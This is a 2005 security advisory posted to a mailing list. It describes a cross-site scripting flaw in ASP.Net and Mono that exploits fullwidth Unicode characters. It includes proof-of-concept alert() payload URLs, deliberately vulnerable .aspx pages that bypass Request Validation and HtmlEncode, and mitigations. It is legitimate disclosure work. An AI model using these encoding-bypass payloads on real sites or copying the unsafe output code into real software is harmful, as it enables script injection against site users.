XSS vulnerabilty in ASP.Net [with details]
In August 2004 I found XSS vulnerability in Microsoft ASP.Net, and now I publish
it.
Full details:
En: http://it-project.ru/andir/docs/aspxvuln/aspxvuln.en.xml
Ru: http://it-project.ru/andir/docs/aspxvuln/aspxvuln.ru.xml
P.S. I to present my appologies for bad english :( My native language is
Russian.
With best regards, Andir!
>From David Ahmad <da@xxxxxxxxxxxxxxxxx>:
>Please include the full details in your message. Thank you!
Details from http://it-project.ru/andir/docs/aspxvuln/aspxvuln.en.xml:
---------------------------------------------------------------------------------
XSS vulnerability in ASP.Net
Andrey Rusyaev, post-graduate student, Security Chair, FESU (Far Eastern State
University), Vladivostok, Russia, andir[SPAM-PROTECT]@it-project.ru.
February 9, 2005, updated February 14, 2005
Abstract
In specific conditions the cross-site scripting attack (XSS) [1] are possible
on web site under management ASP.Net, because used a wrong filtration of
special HTML characters. Attack exploits vulnerability of mechanism of
converting Unicode strings [2] to national ASCII codepages. The basic problem
arises from the lack of a filtration of special HTML characters in range
U+ff00-U+ff60 (fullwidth ASCII characters [3]).
Introduction
The problem has been discovered in August 2004. Affected all versions of .Net
Framework what exist at present day:
* .Net Framework, version 1.0
* .Net Framework, version 1.0 + service pack 1
* .Net Framework, version 1.0 + service pack 2
* .Net Framework, version 1.1
* .Net Framework, version 1.1 + service pack 1
* .Net Framework, version 1.1 + service pack 1 + Security Bulletin MS05-004
from February 8, 2005
After some testing, similar problem has been discovered in free implementation
of .Net Framework by Mono Project [4]. Affected following versions:
* Mono, version 1.0.5.
Note: Another versions has not been tested.
Background
.Net Framework manipulates strings in Unicode only. Converting from/to national
codepages ASCII is possible for input/output respectively. In particular, HTML
text may be outputted on Web page in national ASCII codepage (such as
'windows-1251', 'koi-8', and more) with using ASP.Net. In this conditions
Unicode characters from range U+ff00-U+ff60 (fullwidth ASCII characters) would
be converted to normal ASCII characters respectively. Among fullwidth ASCII
characters present some special HTML characters (such as '<', '>', and others),
which may be used for injecting malicious HTML code or malicious script code
(with <script> HTML tag) or other variants (more details in [5]).
Vulnerability Details
Has been discovered that mechanism of ASP.Net has no filtration of special HTML
characters (such as '>', '<' and others) in Unicode strings for output web page
in one from national ASCII codepages.
1. Injection of special HTML characters to ASP.Net web-page with using
Unicode characters from fullwidth ASCII characters range.
Example:
http://server.com/attack1.aspx?test=%uff1cscript%uff1ealert('vulnerability')%uff1c/script%uff1e
Web page 'attack1.aspx' prints HTTP request parameter 'test'.
Web page like following:
<!-- Web page attack1.aspx -->
<% @Page Language="cs" %>
<%
Response.Write(Request.QueryString["test"]); // Attack through URL
parameter
%>
Web.config for server.com like following:
<configuration>
<system.web>
<globalization responseEncoding="windows-1251" />
</system.web>
</configuration>
2. ASP.NET Request Validation Bypass Vulnerability.
The "Request Validation" mechanism designed to protect against Cross-Site
Scripting and SQL injection allows restricted tags in Unicode range of
fullwidth ASCII characters U+ff00-U+ff60.
Example:
http://server.com/attack2.aspx?test=%uff1cscript%uff1ealert('vulnerability')%uff1c/script%uff1e
Web page 'attack2.aspx' prints HTTP request parameter 'test'.
Web page like following:
<!-- Web page attack2.aspx -->
<% @Page Language="cs" validateRequest="true" %>
<%
Response.Write(Request.QueryString["test"]); // Attack through URL
parameter
%>
Web.config for server.com like following:
<configuration>
<system.web>
<globalization responseEncoding="windows-1251" />
</system.web>
</configuration>
Note: attribute of ASP.Net Web page - validateRequest allowed only for
ASP.Net of version 1.1 and more, or for Mono (no any information about
versions) [6].
3. HTML Encoding methods bypass
Note: This attack does not applied to ASP.Net in Mono implementation.
HttpServerUtility.HtmlEncode has no filtration mechanism for Unicode
characters from range U+ff00-U+ff60.
The methods for encoding special HTML characters does not protect from
attacks in previous examples. Encoding process used before converting to
national ASCII codepage for output, and attacker may use fullwidth ASCII
characters for injecting malicious code on Web page.
Example:
http://server.com/attack3.aspx?test=%uff1cscript%uff1ealert('vulnerability')%uff1c/script%uff1e
Web page 'attack3.aspx' prints:
1. HTTP request parameter 'test',
2. Some string with injected Unicode characters.
Web page like following:
<!-- Web page attack3.aspx -->
<% @Page Language="cs" %>
<%
Response.Write(Server.HtmlEncode(Request.QueryString["test"])); // 1)
Attack through URL parameter
string code =
Server.HtmlEncode("\xff1cscript\xff1ealert('vulnerability')\xff1c/script\xff1e");
// 2) Attack through injected Unicode characters
Response.Write(code);
%>
Web.config for server.com like following:
<configuration>
<system.web>
<globalization responseEncoding="windows-1251" />
</system.web>
</configuration>
Protection Methods
Some variants of protection methods may be proposed:
* Use only Unicode codepage for output on ASP.Net pages, for this purpose
add web.config like following:
<configuration>
<system.web>
<globalization responseEncoding="utf-8" />
</system.web>
</configuration>
* If you cannot use Unicode, you must to filter fullwidth ASCII characters
from any untrusted data sources (user input, HTTP headers, some components
ouput and other data).
More Information
About this vulnerability has been reported to Microsoft Security Response
Center at August 2, 2004 and received answer that opened case 5438 for
description of vulnerability. Later, I received following answer:
"We have decided that a KB article and update to tools and/or best practice
guidelines should be done for this, and will be as time permits. We are not
tracking this case as a security bulletin".
Vulnerability has no patch at current moment (February 9, 2005).
References
1. CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web
Requests, http://www.cert.org/advisories/CA-2000-02.html
2. Unicode Home Page, http://unicode.org/.
3. Unicode.org, Halfwidth and Fullwidth Forms,
http://www.unicode.org/charts/PDF/UFF00.pdf.
4. Mono Project, http://mono-project.com/.
5. CGISecurity.com, "The Cross Site Scripting FAQ.", May 2002,
http://www.cgisecurity.com/articles/xss-faq.shtml.
6. .Net Framework SDK, @Page directive, ValidateRequest attribute,
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/cpgenref/html/cpconPage.asp.